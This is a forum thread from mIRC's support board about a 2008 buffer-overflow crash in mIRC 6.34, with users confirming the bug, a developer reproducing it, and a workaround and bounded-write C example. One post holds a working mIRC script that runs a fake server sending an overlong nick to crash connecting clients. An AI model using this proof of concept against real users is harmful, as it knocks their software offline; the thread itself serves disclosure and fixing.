Joined: Oct 2008
Posts: 1
E
emm1 Offline OP
Mostly harmless
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654

Joined: Dec 2002
Posts: 3,138
C
Hoopy frood
Confirmed, crashes a clean mIRC 6.34.

Joined: Dec 2002
Posts: 5,226
Hoopy frood
This is a server-based exploit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.

Joined: Jun 2008
Posts: 58
P
Babel fish
That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type 04/server localhost %p $+  to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}

Last edited by Pivo; 04/10/08 03:30 PM.
Joined: Oct 2008
Posts: 1
D
Mostly harmless

Joined: Apr 2004
Posts: 867
Sat Offline
Hoopy frood
The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.


Saturn, QuakeNet staff
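
The overflow described in the post above, next to a bounded form, as an added example that is not part of the thread and not mIRC's own code. The function names are hypothetical and the nicks are constructed; only the 300-byte buffer and the "f%s" format come from the post. It shows why 298 is the largest nick length that fits.

```c
#include <stdio.h>
#include <string.h>

#define FONT_KEY_BUF 300   /* buffer size stated in the post */

/* Pattern quoted in the post, unbounded (shown for contrast only):
 *     sprintf(buf, "f%s", nick);
 * 'f' + nick + NUL must fit in 300 bytes, so a nick longer than
 * 298 characters writes past the end of buf. */

/* Longest nick that fits: buffer minus the 'f' prefix and the NUL. */
size_t max_safe_nick_len(size_t buflen)
{
    return buflen >= 2 ? buflen - 2 : 0;
}

/* Hardened form (hypothetical helper): bounded write, and truncation is
 * an error rather than a silently shortened key.
 * Returns 0 on success, -1 if the nick is missing or does not fit. */
int build_font_key(char *buf, size_t buflen, const char *nick)
{
    int n;
    if (buf == NULL || buflen == 0 || nick == NULL)
        return -1;
    n = snprintf(buf, buflen, "f%s", nick);
    if (n < 0 || (size_t)n >= buflen) {
        buf[0] = '\0';             /* leave no partial key behind */
        return -1;
    }
    return 0;
}

/* Demo helper: build a constructed nick of 'len' characters and try it. */
int try_nick_of_length(size_t len)
{
    char nick[512], buf[FONT_KEY_BUF];
    if (len >= sizeof nick)
        return -1;
    memset(nick, 'A', len);
    nick[len] = '\0';
    return build_font_key(buf, sizeof buf, nick);
}

int main(void)
{
    printf("max=%zu 298:%d 299:%d 315:%d\n", max_safe_nick_len(FONT_KEY_BUF),
           try_nick_of_length(298), try_nick_of_length(299), try_nick_of_length(315));
    return 0;
}
```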
Joined: Dec 2002
Posts: 5,226
Hoopy frood
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.

Joined: Oct 2007
Posts: 51
T
Babel fish
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.

